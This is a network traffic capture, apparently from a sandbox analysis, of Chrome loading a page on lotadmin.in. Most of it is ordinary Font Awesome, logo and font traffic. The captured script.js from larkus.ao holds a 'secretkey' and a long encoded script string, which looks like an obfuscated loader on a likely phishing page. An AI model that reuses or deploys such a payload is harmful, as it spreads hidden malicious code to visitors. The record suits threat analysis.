                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70 69 6e 2d 72
                                                                                        Data Ascii: :var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-spin-r
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74
                                                                                        Data Ascii: ;transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webkit
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77 65 62
                                                                                        Data Ascii: );transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-web
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40
                                                                                        Data Ascii: de-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@
                                                                                        2024-12-09 16:47:06 UTC1369INData Raw: 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
                                                                                        Data Ascii: form:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transform:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.54972992.249.45.1214438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:06 UTC606OUTGET /due/cigam/image/logo.png HTTP/1.1
                                                                                        Host: lotadmin.in
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://lotadmin.in/due/cigam/index
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:07 UTC705INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        cache-control: public, max-age=604800
                                                                                        expires: Mon, 16 Dec 2024 16:47:06 GMT
                                                                                        content-type: image/png
                                                                                        last-modified: Fri, 06 Dec 2024 07:02:16 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 1057
                                                                                        date: Mon, 09 Dec 2024 16:47:06 GMT
                                                                                        server: LiteSpeed
                                                                                        platform: hostinger
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-xss-protection: 1; mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:07 UTC663INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 d3 49 44 41 54 68 de ed 58 4d 4e db 50 10 fe 5c b1 45 f1 0d 92 f6 02 b8 27 20 2c da 2d e9 ba 8b 24 27 c0 48 b3 8f d9 8f 14 73 02 8c d4 ae 31 db 76 51 e7 06 c9 01 aa 9a 13 34 e9 05 d2 cd 0c 1a 06 1b 0c 2d c2 91 3c 92 17 ef f9 fd cc 7b df fc 7c f3 82 3f a3 77 5b 34 94 fd ab 9f 41 f2 3d 68 3c 3e f9 b0 0d d0 c9 7f 95 37 dd 15 74 80 75 f2 82 b2 d7 5d 41 7b 84 88 26 00 06 d2 2c 98 b9 68 05 60 44 34 00 30 31 5d 95 ca d5 1c 04 cc 9c 48 7f 26 fd c9 43 f3 77 00 a8 10 40 01 e0 c0 fd 2a da e2 61 03 00 33 d3 be 03 48 c5 61 52 00 3d cb 67 88 28 02 30 d6 36 80 e1 0e 3b 57 6c c0 da 00 58 02 58 cb f9 47
                                                                                        Data Ascii: PNGIHDRlpHYs~IDAThXMNP\E' ,-$'Hs1vQ4-<{|?w[4A=h<>7tu]A{&,h`D401]H&Cw@*a3HaR=g(06;WlXXG
                                                                                        2024-12-09 16:47:07 UTC394INData Raw: f6 5c 3c 7b 62 f6 88 cc be 69 c5 9e c7 a6 bc d9 bd a7 29 21 1a 97 0a 98 b1 38 b8 10 f1 94 30 db 74 5f 95 b0 a6 ff de 38 01 e6 54 88 90 1a ca af 0a c2 b0 a8 29 47 9e 2d 6d 7a 4b cc 0c 95 d5 ba ea e6 99 2f 18 ff 54 44 4b fe ac 6b 97 c6 73 22 63 68 00 30 93 fc 05 ef 69 ee d1 60 f7 01 13 60 56 ae fe 48 9f 51 22 00 c0 a1 78 a9 bd f4 e8 91 b9 f9 03 21 d1 b6 0b 22 1a 10 51 c8 cc 25 33 4f 00 4c 9d b1 a8 17 f5 24 ff d5 e5 d9 65 c3 73 85 6d aa c3 7c 7c bf a8 f0 ba c6 9c c8 cc ff 41 44 ca ae 22 c9 1b c1 23 80 25 62 2c 27 92 97 72 21 19 7d 63 10 b9 e6 58 21 32 6b 43 44 36 f2 7f 69 58 e4 5c 40 53 e2 d4 33 45 72 de c0 00 fb 42 c6 b2 b6 85 44 bd b4 8d 25 1b 4f f4 d2 cc 85 28 ad 5f 8e 1b cc 2d 05 88 8d 99 7b 62 c0 da 00 18 19 9d 7a b2 f6 dc 90 9d 94 99 d7 c2 72 a7 4e 8f
                                                                                        Data Ascii: \<{bi)!80t_8T)G-mzK/TDKks"ch0i``VHQ"x!"Q%3OL$esm||AD"#%b,'r!}cX!2kCD6iX\@S3ErBD%O(_-{bzrN


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.54973265.109.232.1064438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:07 UTC612OUTGET /animal/script.js HTTP/1.1
                                                                                        Host: www.larkus.ao
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://lotadmin.in/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:07 UTC375INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: text/javascript
                                                                                        last-modified: Fri, 06 Dec 2024 13:37:11 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 12802
                                                                                        date: Mon, 09 Dec 2024 16:47:07 GMT
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:07 UTC993INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 56 44 55 67 6b 52 48 30 55 59 42 68 45 4d 46 52 63 56 43 51 63 63 46 79 41 4f 45 77 77 59 53 31 68 5a 56 45 4a 59 65 45 56 55 53 30 55 61 48 41 73 51 42 6b 55 64 47 43 67 57 45 51 77 50 46 30 56 4a 53 30 6f 51 49 77 30 4d 48 41 41 49 41 6a 55 59 46 78 6b 4b 49 67 6f 51 46 79 51 58 46 78 63 4d 47 77 46 62 41 6b 73 4e 46 68 59 58 57 67 73 56 48 51 77 65 45 68 45 4d 41 45 73 42 47 41 41 4c 4d 67 49 47 48 42 46
                                                                                        Data Ascii: var key = "secretkey";var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBF
                                                                                        2024-12-09 16:47:07 UTC11809INData Raw: 67 45 6d 48 77 51 64 42 31 35 7a 55 30 56 44 55 6b 56 55 53 30 55 45 55 77 59 43 42 67 59 63 53 30 30 63 57 6b 55 59 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 49 51 48 51 45 4d 42 55 73 59 42 41 59 59 42 77 77 4d 48 45 73 63 47 51 41 66 55 31 68 44 56 51 51 57 42 42 41 4e 53 51 63 50 45 77 73 66 54 46 35 7a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 41 41 41 41 48 68 63 58 55 30 4a 45 53 57 39 55 53 30 56 5a 55 30 56 44 55 68 68 2b 53 30 56 5a 55 78 68 70 65 45 56 55 53 30 56 57 58 45 55 6b 46 78 46 55 44 77 6f 55 45 67 77 4e 55 67 4d 47 42 41 68 5a 46 67 67 43 47 77 6c 2b 53 30 56 5a 55 77 4d 57 48 41 59 41 41 67 6f 58 55 77 49 47 42 69 45 62 42 67 51 51 48 53 4d 52 48 51 67 78 42 67 51 51 48 30 30 47 48 77 51 64 42 30 78 5a 43 47 39 44
                                                                                        Data Ascii: gEmHwQdB15zU0VDUkVUS0UEUwYCBgYcS00cWkUYeEVUS0VZU0VDUkVUSxIQHQEMBUsYBAYYBwwMHEscGQAfU1hDVQQWBBANSQcPEwsfTF5zU0VDUkVUS0VZU0VDAAAAHhcXU0JESW9US0VZU0VDUhh+S0VZUxhpeEVUS0VWXEUkFxFUDwoUEgwNUgMGBAhZFggCGwl+S0VZUwMWHAYAAgoXUwIGBiEbBgQQHSMRHQgxBgQQH00GHwQdB0xZCG9D


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.54973492.249.45.1214438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:08 UTC359OUTGET /due/cigam/image/logo.png HTTP/1.1
                                                                                        Host: lotadmin.in
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:08 UTC705INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        cache-control: public, max-age=604800
                                                                                        expires: Mon, 16 Dec 2024 16:47:08 GMT
                                                                                        content-type: image/png
                                                                                        last-modified: Fri, 06 Dec 2024 07:02:16 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 1057
                                                                                        date: Mon, 09 Dec 2024 16:47:08 GMT
                                                                                        server: LiteSpeed
                                                                                        platform: hostinger
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-xss-protection: 1; mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        x-frame-options: SAMEORIGIN
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:08 UTC663INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 d3 49 44 41 54 68 de ed 58 4d 4e db 50 10 fe 5c b1 45 f1 0d 92 f6 02 b8 27 20 2c da 2d e9 ba 8b 24 27 c0 48 b3 8f d9 8f 14 73 02 8c d4 ae 31 db 76 51 e7 06 c9 01 aa 9a 13 34 e9 05 d2 cd 0c 1a 06 1b 0c 2d c2 91 3c 92 17 ef f9 fd cc 7b df fc 7c f3 82 3f a3 77 5b 34 94 fd ab 9f 41 f2 3d 68 3c 3e f9 b0 0d d0 c9 7f 95 37 dd 15 74 80 75 f2 82 b2 d7 5d 41 7b 84 88 26 00 06 d2 2c 98 b9 68 05 60 44 34 00 30 31 5d 95 ca d5 1c 04 cc 9c 48 7f 26 fd c9 43 f3 77 00 a8 10 40 01 e0 c0 fd 2a da e2 61 03 00 33 d3 be 03 48 c5 61 52 00 3d cb 67 88 28 02 30 d6 36 80 e1 0e 3b 57 6c c0 da 00 58 02 58 cb f9 47
                                                                                        Data Ascii: PNGIHDRlpHYs~IDAThXMNP\E' ,-$'Hs1vQ4-<{|?w[4A=h<>7tu]A{&,h`D401]H&Cw@*a3HaR=g(06;WlXXG
                                                                                        2024-12-09 16:47:08 UTC394INData Raw: f6 5c 3c 7b 62 f6 88 cc be 69 c5 9e c7 a6 bc d9 bd a7 29 21 1a 97 0a 98 b1 38 b8 10 f1 94 30 db 74 5f 95 b0 a6 ff de 38 01 e6 54 88 90 1a ca af 0a c2 b0 a8 29 47 9e 2d 6d 7a 4b cc 0c 95 d5 ba ea e6 99 2f 18 ff 54 44 4b fe ac 6b 97 c6 73 22 63 68 00 30 93 fc 05 ef 69 ee d1 60 f7 01 13 60 56 ae fe 48 9f 51 22 00 c0 a1 78 a9 bd f4 e8 91 b9 f9 03 21 d1 b6 0b 22 1a 10 51 c8 cc 25 33 4f 00 4c 9d b1 a8 17 f5 24 ff d5 e5 d9 65 c3 73 85 6d aa c3 7c 7c bf a8 f0 ba c6 9c c8 cc ff 41 44 ca ae 22 c9 1b c1 23 80 25 62 2c 27 92 97 72 21 19 7d 63 10 b9 e6 58 21 32 6b 43 44 36 f2 7f 69 58 e4 5c 40 53 e2 d4 33 45 72 de c0 00 fb 42 c6 b2 b6 85 44 bd b4 8d 25 1b 4f f4 d2 cc 85 28 ad 5f 8e 1b cc 2d 05 88 8d 99 7b 62 c0 da 00 18 19 9d 7a b2 f6 dc 90 9d 94 99 d7 c2 72 a7 4e 8f
                                                                                        Data Ascii: \<{bi)!80t_8T)G-mzK/TDKks"ch0i``VHQ"x!"Q%3OL$esm||AD"#%b,'r!}cX!2kCD6iX\@S3ErBD%O(_-{bzrN


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.549735104.17.25.144438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:08 UTC648OUTGET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://lotadmin.in
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: font
                                                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:09 UTC986INHTTP/1.1 200 OK
                                                                                        Date: Mon, 09 Dec 2024 16:47:08 GMT
                                                                                        Content-Type: application/octet-stream; charset=utf-8
                                                                                        Content-Length: 126828
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: "620188b3-1ef6c"
                                                                                        Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 16285
                                                                                        Expires: Sat, 29 Nov 2025 16:47:08 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIK2LnT5ZHv%2FxbkUZmcS4pFsVTReDiQKRXG0N%2F4crk1LWn9sHtNn6YDYV235iz8dd4PbvETCrwiPhy0yJf01%2FKHUX5uhc%2F6dYSR%2FcIu8m8o9XsuiTBUWCH4Bv%2B4GSBJgaFc%2F%2BLtV"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ef679b128518c0b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-09 16:47:09 UTC383INData Raw: 77 4f 46 32 00 01 00 00 00 01 ef 6c 00 0a 00 00 00 04 66 50 00 01 ef 21 03 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 a3 24 00 81 88 68 ca 8f f3 30 cb a3 28 05 87 70 07 20 a5 27 33 92 91 01 40 58 9d 00 00 a8 76 7b 1e 22 2a 9a 3d 3c 44 a4 ad b3 07 40 55 55 55 55 33 12 02 3b 54 35 00 f0 ff c1 8f 7e f2 b3 5f fc ea 37 bf fb c3 9f fe f2 b7 7f fc eb 3f fe eb 7f fe ef 3f 04 06 c7 04 7c 98 96 ed b8 9e cf 6f f8 ef 7f 3f 7e fb cc 7b 5f 7c 30 bf 88 87 84 0f 66 c9 e5 ff 8f 6a 1a 24 35 bc b3 fa 8d 94 44 69 2c 1a d7 c2 5c 0a 48 92 15 cf 26 29 30 c3 8b f1 17 c9 e7 02 6f 09 1f a3 91 b7 ea aa 8f 4c 41 04 d7 16 7b d7 3b b5 2f cb 54 3c 07 35 77 01 36 cf 5a 15 e2 b0 0c 6e d2 e9 40 f2 65 e3 27 c0 e3 37 86 a6 bd fc 14 2e 03
                                                                                        Data Ascii: wOF2lfP!8$ `$h0(p '3@Xv{"*=<D@UUUU3;T5~_7??|o?~{_|0fj$5Di,\H&)0oLA{;/T<5w6Zn@e'7.
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 72 87 5c dd 55 93 7a 3a 4d 77 cd ee ec ec f4 e6 51 1e ad 52 1a 82 90 04 42 ac 10 51 36 a8 41 c6 12 c9 5a 42 7c 36 8c 1c 1e c8 c6 b0 38 e2 a8 96 53 5c 9b ff 6d 3f 27 46 8e 38 af 33 0e f4 1e 91 d5 ac 8c ec aa ca ca aa ca 2c e3 ba 7d 75 d7 74 57 8f af 9a 9a ee 1a b3 bb d3 eb 07 76 61 07 27 86 95 a1 01 dd 02 12 92 06 c1 49 8b cc d3 c8 02 e7 e6 0c d2 ca d2 e7 41 76 e4 2c 8d ce b9 95 e7 f4 46 23 e7 f7 3c 77 7f 57 f3 f3 b4 52 fb af 73 81 aa ea 16 50 03 57 77 57 f7 50 77 4f d3 48 9a d1 b4 80 2c 59 1e d9 96 65 8a 3d c6 38 46 d9 01 3b e8 09 ae 93 25 25 fb b2 09 7b 42 b8 fa 59 ca be b7 9b 4c 16 13 d6 12 46 9b bf 04 5e 82 b4 e0 79 80 6f 6d 7f ee 85 81 f9 c2 0c f3 81 bf b3 7c 76 f6 33 e8 ec f2 1b 95 dd 9d cd 49 51 51 47 45 c5 15 75 76 45 45 45 17 0d 95 6d c9 9d f5 a1
                                                                                        Data Ascii: r\Uz:MwQRBQ6AZB|68S\m?'F83,}utWva'IAv,F#<wWRsPWwWPwOH,Ye=8F;%%{BYLF^yom|v3IQQGEuvEEEm
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 6c 68 68 9e a1 2b 79 ac 51 66 57 5e d3 17 bf 66 e3 be 8c d2 0e d2 7a b5 b6 8d 13 27 66 2c 6b 1b bb 5d 3b 79 ce 54 e5 5c 55 d4 0e ce 83 3a 93 af 8a cb ec c3 33 43 46 a3 e3 46 64 df 58 d6 31 cf 97 5e 7f 8d 74 55 c8 54 15 f3 a2 df 92 68 2d 07 d7 a6 36 31 10 b4 a5 9c d3 4b 92 7e 0d cf 07 0f 61 51 fb e7 4c 1c f6 5f 0c bd 7d cd 9e 10 a7 7c 8e 8d e3 a9 b1 ae d3 c4 81 97 e5 b5 c4 43 c6 c3 9c 93 26 df 1f b4 4a 31 61 9e b9 73 7e 27 37 3a 91 4b 6e 7c c5 96 27 32 ae db bd d0 59 d0 ed 2f 21 99 d6 6f bd 91 1c 7f 28 55 5d dd bd 65 8d 34 7e 5f e4 5f 93 6c b1 e8 75 cc 2d 06 ab 0d 6d 37 e7 06 18 cf 78 57 8b af 79 1e 8f cb 98 a9 b3 b5 f4 73 9b cb 57 f6 c8 6c 9d 8d 17 fb 39 cf 8f c2 c7 91 c3 f3 5d c0 87 f1 bc be a9 5d 79 e4 8c 2f cc 8f 71 f0 76 79 56 88 af e9 af 41 6f b3 6f
                                                                                        Data Ascii: lhh+yQfW^fz'f,k];yT\U:3CFFdX1^tUTh-61K~aQL_}|C&J1as~'7:Kn|'2Y/!o(U]e4~__lu-m7xWysWl9]]y/qvyVAoo
